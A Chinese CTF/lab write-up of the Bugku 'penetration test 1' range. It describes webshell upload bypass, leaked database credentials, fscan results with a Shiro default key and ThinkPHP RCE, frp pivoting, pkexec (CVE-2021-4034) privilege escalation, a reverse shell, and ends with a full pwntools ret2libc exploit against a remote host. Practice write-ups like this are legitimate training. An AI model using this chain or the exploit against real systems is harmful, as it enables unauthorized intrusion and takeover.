bugku 渗透测试1渗透记录

渗透测试1

打靶是的简单记录

flag是我拿到的时间顺序记录

flag2

访问admin跳转登录

账号密码 admin admin

flag1

主页下面

文件上传的点

测试了几个上传的点都是不行

又过了一遍配置

添加运行的后缀

双写绕过即可

普通的马子就可以了，这个连接失败

flag4

<?php
return [
    'type'            => 'mysql',
    'hostname'        => '127.0.0.1',
    'database'        => 'myu',
    'username'        => 'root',
    'password'        => 'root',
    'hostport'        => '3306',
    'prefix'          => 'my_',
];

提示

可以试试nc 还有 root

这里扫描一下端口

有pwn，题目的提示是flag5(我不会

flag3

---

上传fscan

扫描结果

192.168.0.4:3306 open
192.168.0.2:80 open
192.168.0.1:80 open
192.168.0.4:80 open
192.168.0.1:22 open
192.168.0.1:8080 open
192.168.0.3:8080 open
192.168.0.2:9999 open
192.168.0.1:9999 open
[*] WebTitle: http://192.168.0.1:8080   code:302 len:0      title:None 跳转url: http://192.168.0.1:8080/login;jsessionid=327AE782BB035500F3FE03D11113A9BC
[*] WebTitle: http://192.168.0.3:8080   code:302 len:0      title:None 跳转url: http://192.168.0.3:8080/login;jsessionid=579E61FA45E4908865DAFEF20C0E00CE
[*] WebTitle: http://192.168.0.3:8080/login;jsessionid=579E61FA45E4908865DAFEF20C0E00CE code:200 len:2608   title:Login Page
[*] WebTitle: http://192.168.0.1:8080/login;jsessionid=327AE782BB035500F3FE03D11113A9BC code:200 len:2608   title:Login Page
[*] WebTitle: http://192.168.0.1        code:200 len:59431  title:W3School教程系统 | 打造专一的web在线教程系统
[*] WebTitle: http://192.168.0.2        code:200 len:59431  title:W3School教程系统 | 打造专一的web在线教程系统
[*] WebTitle: http://192.168.0.4        code:200 len:8351   title:博客首页
[+] http://192.168.0.1:8080/ poc-yaml-shiro-key [{mode cbc} {key kPH+bIxk5D2deZiIxcaaaA==}]
[+] http://192.168.0.3:8080/ poc-yaml-shiro-key [{key kPH+bIxk5D2deZiIxcaaaA==} {mode cbc}]
[+] http://192.168.0.4 poc-yaml-thinkphp5023-method-rce poc1

0.1 和 0.3 应该是一样的靶机

0.4 有tp rce

直接上传frp

存在漏洞

flag7

flag8

注入内存马

获取flag

（这里直接可以在上面进行命令执行获取的，不用注入马子。我用是的ant的

这里flag6还没拿到，感觉还是在这个网站上面

start.sh 看到了提示

flag6

0.3/0.1 de 就算是打完了

下面就是看0.4 tp

竟然没有可以设置代理的gui工具！！！！

这里换哥斯拉了

flag9

这里有一个提示 database

// 数据库类型
    'type'            => 'mysql',
    // 服务器地址
    'hostname'        => '127.0.0.1',
    // 数据库名
    'database'        => 'aman',
    // 用户名
    'username'        => 'aman',
    // 密码
    'password'        => 'aman123',
    // 端口
    'hostport'        => '',

flag10

这里也提示我们要到root去看看

这里的suid位都没法利用

看一些基础信息

貌似没有什么可以利用的，3.10 有脏牛 但是比较难利用

start.sh 也没有了

sudo 1.8.31 存在漏洞 这里利用失败

pkexec 105 也有漏洞

这里靶机是可以出网的，直接反向链接即可，转移到msf

flag11

用的是 cve-2021-4034 提权的

https://github.com/berdav/CVE-2021-4034

flag5

我不会pwn，找的大佬的wp

pip3 install LibcSearcher
pip3 install pwn

from pwn import * 
from LibcSearcher import *

context.log_level = 'debug'

r = remote('101.133.143.220',9999)

elf = ELF('./main')

main_addr = elf.sym['main']
write_plt = elf.plt['write']
write_got = elf.got['write']

print(write_got)

ppp_ret = 0x08048559

payload = b'A'*(0x24 + 4) + p32(write_plt) + p32(ppp_ret) + p32(1) + p32(write_got) + p32(8) + p32(main_addr)

r.sendlineafter('plz input your name:\n',payload)

write_addr = u32(r.recv(4))

print(hex(write_addr))
 
libc = LibcSearcher('write',write_addr)

libc_base = write_addr - libc.dump('write')

system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
print(hex(system_addr),hex(binsh_addr))

payload = b'A'*40 +p32(system_addr) + b'a'*4 + p32(binsh_addr)
r.sendlineafter('plz input your name:\n',payload)
r.interactive()